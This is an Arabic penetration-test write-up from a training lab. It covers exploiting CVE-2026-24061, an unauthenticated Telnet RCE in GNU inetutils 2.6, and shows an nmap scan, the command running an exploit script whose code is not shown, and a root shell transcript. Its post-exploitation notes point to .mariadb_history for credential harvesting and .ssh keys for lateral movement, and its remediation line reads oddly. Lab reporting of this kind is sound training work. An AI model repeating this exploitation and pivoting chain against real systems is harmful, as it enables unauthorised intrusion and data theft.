
كتابة/نتيجة لـ CVE-2026-24061 داخل مختبر Cyberhawks
إشادة إلى: @SafeBreach-Labs
CVE: CVE-2026-24061
المختبر: مختبر Cyberhawks
الهدف: 10.1.1.1 (demo.cyberhawks.lab)
معرف النتيجة: WU-08
التاريخ: 2026-09-08
الخطورة: حرجة
الحالة: مؤكدة / تم استغلالها
أثناء تقييم بيئة مختبر Cyberhawks، تم تحديد واستغلال ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) غير مصادق عليها بنجاح على المضيف الهدف (10.1.1.1). أدى استغلال CVE-2026-24061 عبر خدمة Telnet المكشوفة (TCP/23) إلى الحصول على قشرة تفاعلية بصلاحيات الجذر، مما منح سيطرة إدارية كاملة على النظام.
| الحقل | القيمة |
|---|---|
| عنوان IP الهدف | 10.1.1.1 |
| اسم المضيف الهدف | demo.cyberhawks.lab |
| نظام التشغيل | Linux 6.12.41+deb13-amd64 (Debian 13) |
| نظام المهاجم | Parrot OS |
| نوع التقييم | اختبار اختراق (بيئة مختبرية) |
تم إجراء فحص إصدارات الخدمات باستخدام Nmap ضد الهدف لتعداد المنافذ والخدمات المفتوحة.
الأمر:
nmap -sV 10.1.1.1
ملخص النتائج:
ملاحظات بارزة:
CVE-2026-24061 هي ثغرة تنفيذ تعليمات برمجية عن بُعد غير مصادق عليها تؤثر على مكوّن خادم Telnet في GNU inetutils 2.6. يسمح الاستغلال لمهاجم عن بُعد غير مصادق بتنفيذ أوامر عشوائية على النظام الهدف بصلاحيات الخدمة قيد التشغيل — في هذه الحالة، root.
تم تنفيذ سكربت استغلال Python مخصص (telnet_rce.py) يستهدف CVE-2026-24061 ضد خدمة Telnet الضعيفة.
الأمر:
python3 telnet_rce.py 10.1.1.1
مخرجات الاستغلال:
[*] Connected to 10.1.1.1:23
[*] Interactive session started. Use Ctrl+C to quit.
Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)
root@demo:~#
عند الحصول على القشرة، أكدت الأوامر التالية مستوى الوصول المحقق:
التحقق من الهوية:
root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)
تعداد نظام الملفات:
root@demo:~# ls -la
total 36
drwx------ 6 root root 4096 Aug 28 14:47 .
drwxr-xr-x 19 root root 4096 Aug 28 15:37 ..
-rw-r--r-- 1 root root 607 May 12 2025 .bashrc
drwx------ 4 root root 4096 Sep 6 2025 .cache
drwxr-xr-x 3 root root 4096 Sep 6 2025 .config
drwxrwxr-x 3 root root 4096 Sep 6 2025 .local
-rw------- 1 root root 261 Sep 6 2025 .mariadb_history
-rw-r--r-- 1 root root 132 May 12 2025 .profile
drwx------ 2 root root 4096 Sep 6 2025 .ssh
التحقق من إصدار الخدمة:
root@demo:~# telnet --version
telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by many authors.
النتائج الرئيسية من مرحلة ما بعد الاستغلال:
.mariadb_history — يشير إلى استخدام نشط لقاعدة بيانات MariaDB؛ إمكانية جمع المزيد من بيانات الاعتماد أو استخراج البيانات..ssh/ — قد يحتوي على مفاتيح خاصة قابلة للاستخدام للحركة الجانبية إلى مضيفين آخرين.root (UID 0) دون الحاجة إلى خطوة تصعيد صلاحيات.| الفئة | التقييم |
|---|---|
| السرية | حرجة — جميع البيانات على النظام قابلة للوصول |
| السلامة | حرجة — يمكن للمهاجم تعديل أو تدمير أي بيانات |
| التوفر | حرجة — يمكن للمهاجم إنهاء الخدمات أو تعطيل النظام |
تم تحقيق اختراق كامل للنظام في خطوة واحدة غير مصادق عليها. يمكن للمهاجم الذي لديه وصول إلى هذا الجزء من الشبكة:
apt update && apt install inetutils-telnetd
| القطعة الأثرية | الوصف |
|---|---|
| مخرجات فحص Nmap | تعداد كامل للمنافذ والخدمات لـ 10.1.1.1 |
telnet_rce.py | سكربت الاستغلال المستخدم لتفعيل CVE-2026-24061 |
| سجل جلسة القشرة | نص كامل لقشرة الجذر التفاعلية |
تم إعداد التقرير لمختبر Cyberhawks — للاستخدام التعليمي فقط.
| المنفذ | الحالة | الخدمة |
|---|
| 21/tcp | مفتوح | FTP (tcpwrapped) |
| 22/tcp | مفتوح | SSH (tcpwrapped) |
| 23/tcp | مفتوح | Telnet |
| 25/tcp | مفتوح | SMTP (tcpwrapped) |
| 53/tcp | مفتوح | DNS (tcpwrapped) |
| 80/tcp | مفتوح | HTTP (tcpwrapped) |
| 110/tcp | مفتوح | POP3 (tcpwrapped) |
| 111/tcp | مفتوح | RPC (tcpwrapped) |
| 139/tcp | مفتوح | NetBIOS (tcpwrapped) |
| 143/tcp | مفتوح | IMAP (tcpwrapped) |
| 445/tcp | مفتوح | SMB (tcpwrapped) |
| 2049/tcp | مفتوح | NFS (tcpwrapped) |
| 3306/tcp | مفتوح | MySQL/MariaDB (tcpwrapped) |
| 3389/tcp | مفتوح | RDP (tcpwrapped) |
| 5901/tcp | مفتوح | VNC (tcpwrapped) |
| الحقل | التفاصيل |
|---|
| CVE | CVE-2026-24061 |
| الخدمة المتأثرة | Telnet (GNU inetutils 2.6, TCP/23) |
| نوع الثغرة | تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه (RCE) |
| درجة CVSS | حرجة |
| المصادقة المطلوبة | لا شيء |
| تفاعل المستخدم المطلوب | لا شيء |